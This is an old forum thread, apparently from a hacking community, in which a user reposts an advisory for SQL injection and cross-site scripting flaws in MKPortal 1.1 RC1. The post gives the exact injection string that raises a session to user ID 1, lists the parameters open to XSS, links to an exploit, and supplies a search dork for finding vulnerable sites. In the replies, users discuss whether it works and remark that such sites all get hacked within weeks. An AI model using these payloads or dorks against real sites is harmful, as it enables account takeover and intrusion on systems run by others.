Bigojey Posted July 7, 2006 Report Posted July 7, 2006 i got this exploit from a friend. his name is Mustafa Can Bjorn but everybody knows him as nukedx ps: i dont know if this exploit was given before so dont be angry pls if you already know this exploit here's the exploit :Vendor: MKPortal (http://www.mkportal.it/)Version: 1.1 RC1 and prior versions must be affected. (Runs on vBulletin!)About: Via this methods remote attacker can inject arbitrary SQL queries to ind parameter in index.php of MKPortal.Vulnerable code can be found in the file mkportal/include/VB/vb_board_functions.php at line 35-37, as you can see it easy toby pass this SQL update function.Also there is cross-site scripting vulnerability in pm_popup.php the parameters u1,m1,m2,m3,m4 did not sanitized properly.Level: Critical---How&Example: SQL Injection :GET -> http://[victim]/[mkportaldir]/index.php?ind=EXAMPLE -> [url]http://[victim]/[/url][mkportaldir]/index.php?ind=',userid='1So with this example remote attacker updates his session's userid to 1 and after refreshing the page he can logs as userid 1.XSS:GET -> [url]http://[victim]/[/url][mkportaldir]/includes/pm_popup.php?u1=[XSS]&m1=[XSS]&m2=[XSS]&m3=[XSS]&m4=[XSS]---Timeline:* 21/04/2006: Vulnerability found.* 21/04/2006: Contacted with vendor and waiting reply.---Exploit:http://www.nukedx.com/?getxpl=26---Dorks: "MKPortal 1.1 RC1"---Original advisory can be found at: http://www.nukedx.com/?viewdoc=26 Quote
Screech Posted July 7, 2006 Report Posted July 7, 2006 mda, l-am gasit si eu mai demult, l-am si incercat acum cateva zile dar nu mi-a mers-----------------------fuck, u are not a romanian boy , i say this:i`ve try this exploit but no work for me Quote
Bigojey Posted July 7, 2006 Author Report Posted July 7, 2006 <div class='quotetop'>QUOTE("Xavier")</div>mda, l-am gasit si eu mai demult, l-am si incercat acum cateva zile dar nu mi-a mers-----------------------fuck, u are not a romanian boy  , i say this:i`ve try this exploit but no work for me pls in english german or espanol i hope it isnt such negativsentence Quote
nos Posted July 7, 2006 Report Posted July 7, 2006 dupa 2 saptamani se invecheste un exploit.cel putin dupa spusele mele dupa 2 saptamani toate site-urile de tipu asta sunt sparte...... Quote
